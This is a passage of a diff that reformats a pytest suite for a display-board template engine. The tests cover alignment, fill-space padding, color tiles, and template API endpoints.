         result = engine.render("{sun} Sunny", context={})
         assert SYMBOL_CHARS["sun"] in result
-    
+
     def test_cloud_symbol(self, engine):
         """Test {cloud} symbol."""
         result = engine.render("{cloud} Cloudy", context={})
         assert SYMBOL_CHARS["cloud"] in result
-    
+
     def test_symbol_case_insensitive(self, engine):
         """Test symbols are case insensitive."""
         result = engine.render("{SUN} {Sun} {sun}", context={})
@@ -162,26 +162,26 @@ class TestSymbols:
 
 class TestValidation:
     """Tests for template validation."""
-    
+
     @pytest.fixture
     def engine(self):
         return TemplateEngine()
-    
+
     def test_valid_template(self, engine):
         """Test valid template has no errors."""
         errors = engine.validate_template("{{date_time.time}} today")
         assert len(errors) == 0
-    
+
     def test_mismatched_braces(self, engine):
         """Test mismatched braces are detected."""
         errors = engine.validate_template("{{weather.temperature} degrees")
         assert any("brace" in e.message.lower() for e in errors)
-    
+
     def test_unknown_source(self, engine):
         """Test unknown source is detected."""
         errors = engine.validate_template("{{unknown.field}}")
         assert any("unknown source" in e.message.lower() for e in errors)
-    
+
     def test_line_too_long_warning(self, engine):
         """Test warning for lines over 22 chars."""
         long_text = "This line is way too long for board"
@@ -191,64 +191,56 @@ class TestValidation:
 
 class TestRenderLines:
     """Tests for render_lines method (template pages)."""
-    
+
     @pytest.fixture
     def engine(self):
         return TemplateEngine()
-    
+
     def test_render_lines_basic(self, engine):
         """Test rendering multiple lines."""
         lines = ["Line 1", "Line 2", "Line 3"]
         context = {}
         result = engine.render_lines(lines, context)
-        
-        output_lines = result.split('\n')
+
+        output_lines = result.split("\n")
         assert len(output_lines) == 6  # Padded to 6
         assert "Line 1" in output_lines[0]
-    
+
     def test_render_lines_pads_to_6(self, engine):
         """Test that output is always 6 lines."""
         result = engine.render_lines(["Only one line"], {})
-        assert len(result.split('\n')) == 6
-    
+        assert len(result.split("\n")) == 6
+
     def test_render_lines_truncates_to_22(self, engine):
         """Test each line is max 22 chars."""
         lines = ["This is a very long line that exceeds 22 characters"]
         result = engine.render_lines(lines, {})
-        output_lines = result.split('\n')
+        output_lines = result.split("\n")
         assert len(output_lines[0]) <= 22
-    
+
     def test_render_lines_multiline_variable(self, engine):
         """Test that variables with newlines are split across multiple output lines."""
         # Create a context with a multi-line variable
-        context = {
-            "test": {
-                "multiline": "Line 1\nLine 2\nLine 3"
-            }
-        }
+        context = {"test": {"multiline": "Line 1\nLine 2\nLine 3"}}
         lines = ["{{test.multiline}}"]
         result = engine.render_lines(lines, context)
-        
-        output_lines = result.split('\n')
+
+        output_lines = result.split("\n")
         assert len(output_lines) == 6  # Should still be 6 lines total
         assert "Line 1" in output_lines[0]
         assert "Line 2" in output_lines[1]
         assert "Line 3" in output_lines[2]
         # Remaining lines should be empty or padded
         assert output_lines[3] == "" or output_lines[3].strip() == ""
-    
+
     def test_render_lines_multiline_variable_exceeds_6_lines(self, engine):
         """Test that multi-line variables exceeding 6 lines are truncated."""
         # Create a variable with more than 6 lines
-        context = {
-            "test": {
-                "multiline": "\n".join([f"Line {i}" for i in range(1, 10)])
-            }
-        }
+        context = {"test": {"multiline": "\n".join([f"Line {i}" for i in range(1, 10)])}}
         lines = ["{{test.multiline}}"]
         result = engine.render_lines(lines, context)
-        
-        output_lines = result.split('\n')
+
+        output_lines = result.split("\n")
         assert len(output_lines) == 6  # Should be exactly 6 lines
         assert "Line 1" in output_lines[0]
         assert "Line 6" in output_lines[5]  # Last line should be Line 6, not Line 9
@@ -256,16 +248,16 @@ class TestRenderLines:
 
 class TestAvailableVariables:
     """Tests for available variables listing via plugin system."""
-    
+
     @pytest.fixture
     def engine(self):
         return TemplateEngine()
-    
+
     def test_get_available_variables_returns_dict(self, engine):
         """Test get_available_variables returns a dictionary."""
         variables = engine.get_available_variables()
         assert isinstance(variables, dict)
-    
+
     def test_get_all_known_sources_returns_set(self, engine):
         """Test _get_all_known_sources returns a set of plugin IDs."""
         sources = engine._get_all_known_sources()
@@ -274,70 +266,70 @@ class TestAvailableVariables:
 
 class TestAlignment:
     """Tests for line alignment handling."""
-    
+
     @pytest.fixture
     def engine(self):
         return TemplateEngine()
-    
+
     def test_extract_alignment_left_implicit(self, engine):
         """Test left alignment is default."""
         alignment, wrap_enabled, content = engine._extract_alignment("Hello World")
         assert alignment == "left"
         assert wrap_enabled is False
         assert content == "Hello World"
-    
+
     def test_extract_alignment_left_explicit(self, engine):
         """Test explicit {left} prefix."""
         alignment, wrap_enabled, content = engine._extract_alignment("{left}Hello World")
         assert alignment == "left"
         assert wrap_enabled is False
         assert content == "Hello World"
-    
+
     def test_extract_alignment_center(self, engine):
         """Test {center} prefix."""
         alignment, wrap_enabled, content = engine._extract_alignment("{center}Hello World")
         assert alignment == "center"
         assert wrap_enabled is False
         assert content == "Hello World"
-    
+
     def test_extract_alignment_right(self, engine):
         """Test {right} prefix."""
         alignment, wrap_enabled, content = engine._extract_alignment("{right}Hello World")
         assert alignment == "right"
         assert wrap_enabled is False
         assert content == "Hello World"
-    
+
     def test_extract_alignment_case_insensitive(self, engine):
         """Test alignment prefix is case insensitive."""
         alignment, wrap_enabled, content = engine._extract_alignment("{CENTER}Hello")
         assert alignment == "center"
         assert wrap_enabled is False
         assert content == "Hello"
-    
+
     def test_apply_alignment_left(self, engine):
         """Test left alignment pads on the right."""
         result = engine._apply_alignment("Hello", "left", width=10)
         assert result == "Hello     "
         assert len(result) == 10
-    
+
     def test_apply_alignment_center(self, engine):
         """Test center alignment pads both sides."""
         result = engine._apply_alignment("Hello", "center", width=10)
         # "Hello" is 5 chars, 5 spaces to add, 2 left + 3 right
         assert result == "  Hello   "
         assert len(result) == 10
-    
+
     def test_apply_alignment_right(self, engine):
         """Test right alignment pads on the left."""
         result = engine._apply_alignment("Hello", "right", width=10)
         assert result == "     Hello"
         assert len(result) == 10
-    
+
     def test_render_lines_with_center_alignment(self, engine):
         """Test render_lines applies center alignment."""
         lines = ["{center}TEST"]
         result = engine.render_lines(lines, {})
-        output_lines = result.split('\n')
+        output_lines = result.split("\n")
         # "TEST" is 4 chars, centered in 22 chars: 9 spaces + TEST + 9 spaces
         assert "TEST" in output_lines[0]
         assert output_lines[0].strip() == "TEST"
@@ -346,12 +338,12 @@ class TestAlignment:
         left_pad = len(output_lines[0]) - len(output_lines[0].lstrip())
         right_pad = len(output_lines[0]) - len(output_lines[0].rstrip())
         assert abs(left_pad - right_pad) <= 1  # Allow 1 char difference for odd widths
-    
+
     def test_render_lines_with_right_alignment(self, engine):
         """Test render_lines applies right alignment."""
         lines = ["{right}TEST"]
         result = engine.render_lines(lines, {})
-        output_lines = result.split('\n')
+        output_lines = result.split("\n")
         # "TEST" should be at the right
         assert output_lines[0].endswith("TEST")
         assert len(output_lines[0]) == 22
@@ -361,7 +353,7 @@ class TestAlignment:
         lines = ["TEST"]
         metadata = [{"alignment": "center", "wrap": False}]
         result = engine.render_lines(lines, {}, line_metadata=metadata)
-        output_lines = result.split('\n')
+        output_lines = result.split("\n")
         assert output_lines[0].strip() == "TEST"
         assert len(output_lines[0]) == 22
         left_pad = len(output_lines[0]) - len(output_lines[0].lstrip())
@@ -373,7 +365,7 @@ class TestAlignment:
         lines = ["TEST"]
         metadata = [{"alignment": "right", "wrap": False}]
         result = engine.render_lines(lines, {}, line_metadata=metadata)
-        output_lines = result.split('\n')
+        output_lines = result.split("\n")
         assert output_lines[0].endswith("TEST")
         assert len(output_lines[0]) == 22
 
@@ -382,7 +374,7 @@ class TestAlignment:
         lines = ["{center}TEST"]
         metadata = [{"alignment": "left", "wrap": False}]
         result = engine.render_lines(lines, {}, line_metadata=metadata)
-        output_lines = result.split('\n')
+        output_lines = result.split("\n")
         # The {center} prefix is treated as literal content (left-aligned)
         assert output_lines[0].startswith("{center}TEST")
 
@@ -399,7 +391,7 @@ class TestNoteAlignment:
         lines = ["HELLO WORLD"]
         metadata = [{"alignment": "center", "wrap": False}]
         result = engine.render_lines(lines, {}, line_metadata=metadata, device_type="note")
-        output_lines = result.split('\n')
+        output_lines = result.split("\n")
         # "HELLO WORLD" is 11 chars, centered in 15: 2 left + 11 + 2 right
         assert output_lines[0].strip() == "HELLO WORLD"
         assert len(output_lines[0]) == 15
@@ -412,7 +404,7 @@ class TestNoteAlignment:
         lines = ["TEST"]
         metadata = [{"alignment": "right", "wrap": False}]
         result = engine.render_lines(lines, {}, line_metadata=metadata, device_type="note")
-        output_lines = result.split('\n')
+        output_lines = result.split("\n")
         assert output_lines[0].endswith("TEST")
         assert len(output_lines[0]) == 15
 
@@ -421,7 +413,7 @@ class TestNoteAlignment:
         lines = ["TEST"]
         metadata = [{"alignment": "left", "wrap": False}]
         result = engine.render_lines(lines, {}, line_metadata=metadata, device_type="note")
-        output_lines = result.split('\n')
+        output_lines = result.split("\n")
         assert output_lines[0].startswith("TEST")
         assert len(output_lines[0]) == 15
 
@@ -430,14 +422,14 @@ class TestNoteAlignment:
         lines = ["LINE1"]
         metadata = [{"alignment": "left", "wrap": False}]
         result = engine.render_lines(lines, {}, line_metadata=metadata, device_type="note")
-        output_lines = result.split('\n')
+        output_lines = result.split("\n")
         assert len(output_lines) == 3
 
     def test_render_lines_note_center_prefix(self, engine):
         """Test center alignment via inline prefix on Note boards."""
         lines = ["{center}HI"]
         result = engine.render_lines(lines, {}, device_type="note")
-        output_lines = result.split('\n')
+        output_lines = result.split("\n")
         # "HI" is 2 chars, centered in 15: 6 left + 2 + 7 right (or 7+6)
         assert output_lines[0].strip() == "HI"
         assert len(output_lines[0]) == 15
@@ -450,7 +442,7 @@ class TestNoteAlignment:
         lines = ["TEST"]
         metadata = [{"alignment": "center", "wrap": False}]
         result = engine.render_lines(lines, {}, line_metadata=metadata, device_type="flagship")
-        output_lines = result.split('\n')
+        output_lines = result.split("\n")
         assert len(output_lines) == 6
         assert len(output_lines[0]) == 22
 
@@ -459,21 +451,21 @@ class TestNoteAlignment:
         lines = ["TEST"]
         metadata = [{"alignment": "center", "wrap": False}]
         result = engine.render_lines(lines, {}, line_metadata=metadata)
-        output_lines = result.split('\n')
+        output_lines = result.split("\n")
         assert len(output_lines) == 6
         assert len(output_lines[0]) == 22
 
 
 class TestFillSpace:
     """Tests for {{fill_space}} variable."""
-    
+
     # The fill_space marker used internally after variable substitution
-    FILL_MARKER = '\x00FILL_SPACE\x00'
-    
+    FILL_MARKER = "\x00FILL_SPACE\x00"
+
     @pytest.fixture
     def engine(self):
         return TemplateEngine()
-    
+
     def test_single_fill_space(self, engine):
         """Test single fill_space expands to fill remaining width."""
         # Direct test of _process_fill_space uses the internal marker
@@ -481,43 +473,43 @@ class TestFillSpace:
         # "A" + spaces + "B" = 10 chars
         assert result == "A        B"
         assert len(result) == 10
-    
+
     def test_double_fill_space(self, engine):
         """Test two fill_spaces distribute space evenly."""
         result = engine._process_fill_space(f"A{self.FILL_MARKER}B{self.FILL_MARKER}C", width=11)
         # "A" + 4 spaces + "B" + 4 spaces + "C" = 11 chars (4+4 = 8 spaces for 8 remaining)
         assert result == "A    B    C"
         assert len(result) == 11
-    
+
     def test_fill_space_no_room(self, engine):
         """Test fill_space removed when no room."""
         result = engine._process_fill_space(f"ABCDEFGHIJKLMNOPQRSTUV{self.FILL_MARKER}W", width=22)
         # 23 chars with W, no room for fill, should truncate
         assert self.FILL_MARKER not in result
         assert len(result) <= 22
-    
+
     def test_fill_space_case_insensitive(self, engine):
         """Test fill_space variable is case insensitive (via full render path)."""
         # Test via full render to verify case insensitivity of the variable
         result = engine.render("A{{FILL_SPACE}}B", context={})
         # Should have the marker in it (case insensitive variable lookup)
         assert self.FILL_MARKER in result
-    
+
     def test_render_lines_with_fill_space(self, engine):
         """Test render_lines processes fill_space."""
         lines = ["LEFT{{fill_space}}RIGHT"]
         result = engine.render_lines(lines, {})
-        output_lines = result.split('\n')
+        output_lines = result.split("\n")
         # Should have "LEFT" at start and "RIGHT" at end
         assert output_lines[0].startswith("LEFT")
         assert output_lines[0].endswith("RIGHT")
         assert len(output_lines[0]) == 22
-    
+
     def test_fill_space_three_columns(self, engine):
         """Test three-column layout with two fill_spaces."""
         lines = ["A{{fill_space}}B{{fill_space}}C"]
         result = engine.render_lines(lines, {})
-        output_lines = result.split('\n')
+        output_lines = result.split("\n")
         # "A", "B", "C" = 3 chars, 19 spaces to distribute
         assert output_lines[0].startswith("A")
         assert output_lines[0].endswith("C")
@@ -530,11 +522,11 @@ class TestFillSpace:
 
 class TestAlignmentWithFillSpace:
     """Tests for combining alignment and fill_space."""
-    
+
     @pytest.fixture
     def engine(self):
         return TemplateEngine()
-    
+
     def test_fill_space_with_center_alignment(self, engine):
         """Test fill_space with center alignment - fill_space fills the line first."""
         # When fill_space is present, it fills the remaining space first
@@ -542,7 +534,7 @@ class TestAlignmentWithFillSpace:
         # the alignment has no additional effect
         lines = ["{center}A{{fill_space}}B"]
         result = engine.render_lines(lines, {})
-        output_lines = result.split('\n')
+        output_lines = result.split("\n")
         # fill_space should push A and B apart within the 22 char width
         # "A" + 20 spaces + "B" = 22 chars
         assert "A" in output_lines[0]
@@ -551,13 +543,13 @@ class TestAlignmentWithFillSpace:
         # A should be at start, B at end since fill_space expands between them
         assert output_lines[0].strip().startswith("A")
         assert output_lines[0].strip().endswith("B")
-    
+
     def test_alignment_without_fill_space(self, engine):
         """Test alignment works independently of fill_space."""
         # Pure center alignment without fill_space
         lines = ["{center}ABC"]
         result = engine.render_lines(lines, {})
-        output_lines = result.split('\n')
+        output_lines = result.split("\n")
         # Should be centered
         stripped = output_lines[0].strip()
         assert stripped == "ABC"
@@ -568,134 +560,134 @@ class TestAlignmentWithFillSpace:
 
 class TestNoteFillSpaceRepeat:
     """Tests for FILL_SPACE_REPEAT on NOTE devices (15 cols, 3 rows).
-    
+
     FILL_SPACE_REPEAT was off by 1 on NOTE - the last flap was not filled.
     """
-    
+
     @pytest.fixture
     def engine(self):
         return TemplateEngine()
-    
+
     def test_fill_space_repeat_blue_note(self, engine):
         """FILL_SPACE_REPEAT:BLUE should fill all remaining tiles on NOTE."""
-        lines = ['LUNCH:{{FILL_SPACE_REPEAT:BLUE}}', '', '']
-        meta = [{'alignment': 'left', 'wrap': False}] * 3
-        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type='note')
-        first_line = result.split('\n')[0]
+        lines = ["LUNCH:{{FILL_SPACE_REPEAT:BLUE}}", "", ""]
+        meta = [{"alignment": "left", "wrap": False}] * 3
+        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type="note")
+        first_line = result.split("\n")[0]
         tile_count = engine._count_tiles(first_line)
         assert tile_count == 15, f"Expected 15 tiles, got {tile_count}"
         # "LUNCH:" = 6 tiles, remaining = 9 blue tiles
-        blue_count = first_line.count('{67}')
+        blue_count = first_line.count("{67}")
         assert blue_count == 9, f"Expected 9 blue tiles, got {blue_count}"
-    
+
     def test_fill_space_repeat_red_note(self, engine):
         """FILL_SPACE_REPEAT:RED should fill all remaining tiles on NOTE."""
-        lines = ['HI:{{FILL_SPACE_REPEAT:RED}}', '', '']
-        meta = [{'alignment': 'left', 'wrap': False}] * 3
-        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type='note')
-        first_line = result.split('\n')[0]
+        lines = ["HI:{{FILL_SPACE_REPEAT:RED}}", "", ""]
+        meta = [{"alignment": "left", "wrap": False}] * 3
+        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type="note")
+        first_line = result.split("\n")[0]
         tile_count = engine._count_tiles(first_line)
         assert tile_count == 15
         # "HI:" = 3 tiles, remaining = 12 red tiles
-        red_count = first_line.count('{63}')
+        red_count = first_line.count("{63}")
         assert red_count == 12
-    
+
     def test_fill_space_repeat_fills_entire_note_line(self, engine):
         """FILL_SPACE_REPEAT alone should fill entire line on NOTE."""
-        lines = ['{{FILL_SPACE_REPEAT:GREEN}}', '', '']
-        meta = [{'alignment': 'left', 'wrap': False}] * 3
-        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type='note')
-        first_line = result.split('\n')[0]
+        lines = ["{{FILL_SPACE_REPEAT:GREEN}}", "", ""]
+        meta = [{"alignment": "left", "wrap": False}] * 3
+        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type="note")
+        first_line = result.split("\n")[0]
         tile_count = engine._count_tiles(first_line)
         assert tile_count == 15
-        green_count = first_line.count('{66}')
+        green_count = first_line.count("{66}")
         assert green_count == 15
-    
+
     def test_fill_space_repeat_note_vs_flagship(self, engine):
         """FILL_SPACE_REPEAT should produce different tile counts for NOTE vs flagship."""
-        lines_note = ['AB{{FILL_SPACE_REPEAT:BLUE}}', '', '']
-        lines_flag = ['AB{{FILL_SPACE_REPEAT:BLUE}}'] + [''] * 5
-        meta_note = [{'alignment': 'left', 'wrap': False}] * 3
-        meta_flag = [{'alignment': 'left', 'wrap': False}] * 6
-        
-        result_note = engine.render_lines(lines_note, context={}, line_metadata=meta_note, device_type='note')
-        result_flag = engine.render_lines(lines_flag, context={}, line_metadata=meta_flag, device_type='flagship')
-        
-        note_line = result_note.split('\n')[0]
-        flag_line = result_flag.split('\n')[0]
-        
-        note_blue = note_line.count('{67}')
-        flag_blue = flag_line.count('{67}')
-        
+        lines_note = ["AB{{FILL_SPACE_REPEAT:BLUE}}", "", ""]
+        lines_flag = ["AB{{FILL_SPACE_REPEAT:BLUE}}"] + [""] * 5
+        meta_note = [{"alignment": "left", "wrap": False}] * 3
+        meta_flag = [{"alignment": "left", "wrap": False}] * 6
+
+        result_note = engine.render_lines(lines_note, context={}, line_metadata=meta_note, device_type="note")
+        result_flag = engine.render_lines(lines_flag, context={}, line_metadata=meta_flag, device_type="flagship")
+
+        note_line = result_note.split("\n")[0]
+        flag_line = result_flag.split("\n")[0]
+
+        note_blue = note_line.count("{67}")
+        flag_blue = flag_line.count("{67}")
+
         # NOTE: "AB" = 2 tiles, remaining = 15 - 2 = 13 blue
         assert note_blue == 13
         # Flagship: "AB" = 2 tiles, remaining = 22 - 2 = 20 blue
         assert flag_blue == 20
-    
+
     def test_fill_space_repeat_note_3_rows(self, engine):
         """NOTE device should only have 3 rows."""
-        lines = ['A{{FILL_SPACE_REPEAT:BLUE}}', 'B{{FILL_SPACE_REPEAT:RED}}', 'C{{FILL_SPACE_REPEAT:GREEN}}']
-        meta = [{'alignment': 'left', 'wrap': False}] * 3
-        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type='note')
-        output_lines = result.split('\n')
+        lines = ["A{{FILL_SPACE_REPEAT:BLUE}}", "B{{FILL_SPACE_REPEAT:RED}}", "C{{FILL_SPACE_REPEAT:GREEN}}"]
+        meta = [{"alignment": "left", "wrap": False}] * 3
+        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type="note")
+        output_lines = result.split("\n")
         assert len(output_lines) == 3
-        
+
         # Each line should have 15 tiles
         for line in output_lines:
             assert engine._count_tiles(line) == 15
-        
+
         # Line 0: A + 14 blue
-        assert output_lines[0].count('{67}') == 14
+        assert output_lines[0].count("{67}") == 14
         # Line 1: B + 14 red
-        assert output_lines[1].count('{63}') == 14
+        assert output_lines[1].count("{63}") == 14
         # Line 2: C + 14 green
-        assert output_lines[2].count('{66}') == 14
-    
+        assert output_lines[2].count("{66}") == 14
+
     def test_fill_space_repeat_with_text_pattern_note(self, engine):
         """FILL_SPACE_REPEAT with text pattern (dash) on NOTE."""
-        lines = ['AB{{FILL_SPACE_REPEAT:-}}CD', '', '']
-        meta = [{'alignment': 'left', 'wrap': False}] * 3
-        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type='note')
-        first_line = result.split('\n')[0]
+        lines = ["AB{{FILL_SPACE_REPEAT:-}}CD", "", ""]
+        meta = [{"alignment": "left", "wrap": False}] * 3
+        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type="note")
+        first_line = result.split("\n")[0]
         # "AB" + dashes + "CD" = 15 chars
         assert len(first_line) == 15
         # AB + 11 dashes + CD
-        assert first_line == 'AB-----------CD'
-    
+        assert first_line == "AB-----------CD"
+
     def test_fill_space_no_repeat_note(self, engine):
         """Regular fill_space (spaces) should also work correctly on NOTE."""
-        lines = ['AB{{fill_space}}CD', '', '']
-        meta = [{'alignment': 'left', 'wrap': False}] * 3
-        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type='note')
-        first_line = result.split('\n')[0]
+        lines = ["AB{{fill_space}}CD", "", ""]
+        meta = [{"alignment": "left", "wrap": False}] * 3
+        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type="note")
+        first_line = result.split("\n")[0]
         assert len(first_line) == 15
-        assert first_line.startswith('AB')
-        assert first_line.endswith('CD')
-    
+        assert first_line.startswith("AB")
+        assert first_line.endswith("CD")
+
     def test_fill_space_repeat_case_insensitive_note(self, engine):
         """FILL_SPACE_REPEAT should be case-insensitive on NOTE."""
         for template in [
-            'X{{FILL_SPACE_REPEAT:BLUE}}',
-            'X{{fill_space_repeat:blue}}',
-            'X{{Fill_Space_Repeat:Blue}}',
+            "X{{FILL_SPACE_REPEAT:BLUE}}",
+            "X{{fill_space_repeat:blue}}",
+            "X{{Fill_Space_Repeat:Blue}}",
         ]:
-            lines = [template, '', '']
-            meta = [{'alignment': 'left', 'wrap': False}] * 3
-            result = engine.render_lines(lines, context={}, line_metadata=meta, device_type='note')
-            first_line = result.split('\n')[0]
+            lines = [template, "", ""]
+            meta = [{"alignment": "left", "wrap": False}] * 3
+            result = engine.render_lines(lines, context={}, line_metadata=meta, device_type="note")
+            first_line = result.split("\n")[0]
             tile_count = engine._count_tiles(first_line)
             assert tile_count == 15, f"Template {template!r}: expected 15 tiles, got {tile_count}"
-            blue_count = first_line.count('{67}')
+            blue_count = first_line.count("{67}")
             assert blue_count == 14, f"Template {template!r}: expected 14 blue tiles, got {blue_count}"
-    
+
     def test_process_fill_space_note_width(self, engine):
         """Direct _process_fill_space test with NOTE width."""
-        marker = '\x00FILL_SPACE_REPEAT:BLUE\x00'
-        text = f'LUNCH:{marker}'
+        marker = "\x00FILL_SPACE_REPEAT:BLUE\x00"
+        text = f"LUNCH:{marker}"
         result = engine._process_fill_space(text, width=15)
         tile_count = engine._count_tiles(result)
         assert tile_count == 15, f"Expected 15 tiles, got {tile_count}"
-        blue_count = result.count('{67}')
+        blue_count = result.count("{67}")
         assert blue_count == 9, f"Expected 9 blue tiles, got {blue_count}"
 
 
@@ -707,41 +699,41 @@ class TestFilledSyntax:
         return TemplateEngine()
 
     def test_filled_with_dot_char(self, engine):
-        lines = ['AB{{filled:.}}CD', '', '', '', '', '']
-        meta = [{'alignment': 'left', 'wrap': False}] * 6
-        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type='flagship')
-        first = result.split('\n')[0]
-        assert first == 'AB' + '.' * 18 + 'CD'
+        lines = ["AB{{filled:.}}CD", "", "", "", "", ""]
+        meta = [{"alignment": "left", "wrap": False}] * 6
+        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type="flagship")
+        first = result.split("\n")[0]
+        assert first == "AB" + "." * 18 + "CD"
 
     def test_filled_with_dash_char(self, engine):
-        lines = ['{{filled:-}}'] + [''] * 5
-        meta = [{'alignment': 'left', 'wrap': False}] * 6
-        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type='flagship')
-        first = result.split('\n')[0]
-        assert first == '-' * 22
+        lines = ["{{filled:-}}"] + [""] * 5
+        meta = [{"alignment": "left", "wrap": False}] * 6
+        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type="flagship")
+        first = result.split("\n")[0]
+        assert first == "-" * 22
 
     def test_filled_with_color_name(self, engine):
-        lines = ['{{filled:green}}'] + [''] * 5
-        meta = [{'alignment': 'left', 'wrap': False}] * 6
-        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type='flagship')
-        first = result.split('\n')[0]
-        assert first.count('{66}') == 22
+        lines = ["{{filled:green}}"] + [""] * 5
+        meta = [{"alignment": "left", "wrap": False}] * 6
+        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type="flagship")
+        first = result.split("\n")[0]
+        assert first.count("{66}") == 22
 
     def test_filled_note_device(self, engine):
-        lines = ['X{{filled:red}}', '', '']
-        meta = [{'alignment': 'left', 'wrap': False}] * 3
-        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type='note')
-        first = result.split('\n')[0]
+        lines = ["X{{filled:red}}", "", ""]
+        meta = [{"alignment": "left", "wrap": False}] * 3
+        result = engine.render_lines(lines, context={}, line_metadata=meta, device_type="note")
+        first = result.split("\n")[0]
         assert engine._count_tiles(first) == 15
-        assert first.count('{63}') == 14
+        assert first.count("{63}") == 14
 
     def test_filled_case_insensitive(self, engine):
-        for template in ['{{filled:blue}}', '{{FILLED:BLUE}}', '{{Filled:Blue}}']:
-            lines = [template] + [''] * 5
-            meta = [{'alignment': 'left', 'wrap': False}] * 6
-            result = engine.render_lines(lines, context={}, line_metadata=meta, device_type='flagship')
-            first = result.split('\n')[0]
-            assert first.count('{67}') == 22, f"Failed for {template!r}"
+        for template in ["{{filled:blue}}", "{{FILLED:BLUE}}", "{{Filled:Blue}}"]:
+            lines = [template] + [""] * 5
+            meta = [{"alignment": "left", "wrap": False}] * 6
+            result = engine.render_lines(lines, context={}, line_metadata=meta, device_type="flagship")
+            first = result.split("\n")[0]
+            assert first.count("{67}") == 22, f"Failed for {template!r}"
 
 
 class TestTemplateEngineDefaults:
@@ -757,9 +749,10 @@ class TestTemplateEngineDefaults:
             mock_registry._manifests = {}
 
             from src.templates.engine import TemplateEngine
+
             engine = TemplateEngine()
 
-            max_lengths = engine._get_max_lengths_for_validation()
+            engine._get_max_lengths_for_validation()
             line = "{{unknown_plugin.field}}"
             max_len = engine._calculate_max_line_length(line)
             assert max_len == 22
@@ -767,100 +760,93 @@ class TestTemplateEngineDefaults:
 
 class TestTemplateAPIEndpoints:
     """Tests for template API endpoints."""
-    
+
     @pytest.fixture
     def client(self):
-        from src.api_server import app
         from fastapi.testclient import TestClient
+
+        from src.api_server import app
+
         return TestClient(app)
-    
+
     def test_get_template_variables(self, client):
         """Test GET /templates/variables."""
         response = client.get("/templates/variables")
-        
+
         assert response.status_code == 200
         data = response.json()
         assert "variables" in data
         assert "colors" in data
         assert "symbols" in data
-    
+
     def test_validate_template_valid(self, client):
         """Test POST /templates/validate with valid template."""
-        response = client.post("/templates/validate", json={
-            "template": "{{date_time.time}}"
-        })
-        
+        response = client.post("/templates/validate", json={"template": "{{date_time.time}}"})
+
         assert response.status_code == 200
         data = response.json()
         assert data["valid"] is True
-    
+
     def test_validate_template_invalid(self, client):
         """Test POST /templates/validate with invalid template."""
-        response = client.post("/templates/validate", json={
-            "template": "{{date_time.time"  # Missing closing
-        })
-        
+        response = client.post(
+            "/templates/validate",
+            json={
+                "template": "{{date_time.time"  # Missing closing
+            },
+        )
+
         assert response.status_code == 200
         data = response.json()
         assert data["valid"] is False
-    
-    @patch('src.api_server.get_template_engine')
+
+    @patch("src.api_server.get_template_engine")
     def test_render_template(self, mock_get_engine, client):
         """Test POST /templates/render."""
         mock_engine = Mock()
         mock_engine.render.return_value = "72 degrees"
         mock_engine.render_lines.return_value = "72 degrees"
         mock_get_engine.return_value = mock_engine
-        
-        response = client.post("/templates/render", json={
-            "template": "{{weather.temperature}} degrees"
-        })
-        
+
+        response = client.post("/templates/render", json={"template": "{{weather.temperature}} degrees"})
+
         assert response.status_code == 200
         data = response.json()
         assert "rendered" in data
-    
+
     def test_render_template_empty_list(self, client):
         """Test POST /templates/render with empty list returns quickly."""
-        response = client.post("/templates/render", json={
-            "template": []
-        })
-        
+        response = client.post("/templates/render", json={"template": []})
+
         assert response.status_code == 200
         data = response.json()
         assert "rendered" in data
         assert data["line_count"] == 6
         assert all(line == "" for line in data["lines"])
-    
+
     def test_render_template_all_empty_strings(self, client):
         """Test POST /templates/render with all empty strings."""
-        response = client.post("/templates/render", json={
-            "template": ["", "", "", "", "", ""]
-        })
-        
+        response = client.post("/templates/render", json={"template": ["", "", "", "", "", ""]})
+
         assert response.status_code == 200
         data = response.json()
         assert "rendered" in data
         assert data["line_count"] == 6
         assert all(line == "" for line in data["lines"])
-    
+
     def test_render_template_empty_string(self, client):
         """Test POST /templates/render with empty string."""
-        response = client.post("/templates/render", json={
-            "template": ""
-        })
-        
+        response = client.post("/templates/render", json={"template": ""})
+
         assert response.status_code == 200
         data = response.json()
         assert "rendered" in data
         assert data["line_count"] == 6
-    
+
     def test_render_template_whitespace_only(self, client):
         """Test POST /templates/render with whitespace-only strings."""
-        response = client.post("/templates/render", json={
-            "template": ["   ", "  ", " ", "", "", ""]
-        })
-        
+        response = client.post("/templates/render", json={"template": ["   ", "  ", " ", "", "", ""]})
+
         assert response.status_code == 200
         data = response.json()
         assert "rendered" in data
@@ -870,23 +856,23 @@ class TestTemplateAPIEndpoints:
 
 class TestColorWrapping:
     """Tests for color marker wrapping behavior."""
-    
+
     @pytest.fixture
     def engine(self):
         return TemplateEngine()
-    
+
     def test_color_blocks_wrap_correctly(self, engine):
         """Test that color blocks wrap correctly without splitting markers."""
         # Create a string of 120 color blocks (enough to wrap to 5+ lines)
         # Each {67} is 4 characters but 1 tile, so 120 tiles = 5.45 lines at 22 tiles/line
         color_string = "{67}" * 120
-        
+
         # Wrap it to 5 lines
         wrapped = engine._word_wrap_tiles(color_string, first_width=22, subsequent_width=22, max_lines=5)
-        
+
         # Verify we got 5 lines
         assert len(wrapped) == 5
-        
+
         # Verify each line contains only valid color markers
         # No partial markers like {67 or }67} should exist
         for line in wrapped:
@@ -896,7 +882,7 @@ class TestColorWrapping:
             close_braces = line.count("}")
             # They should be equal (each marker has both)
             assert open_braces == close_braces, f"Line has mismatched braces: {line}"
-            
+
             # Verify no partial markers (opening brace without closing, or closing without opening)
             # Check that every { is followed by a } before the next {
             i = 0
@@ -906,28 +892,29 @@ class TestColorWrapping:
                     closing = line.find("}", i)
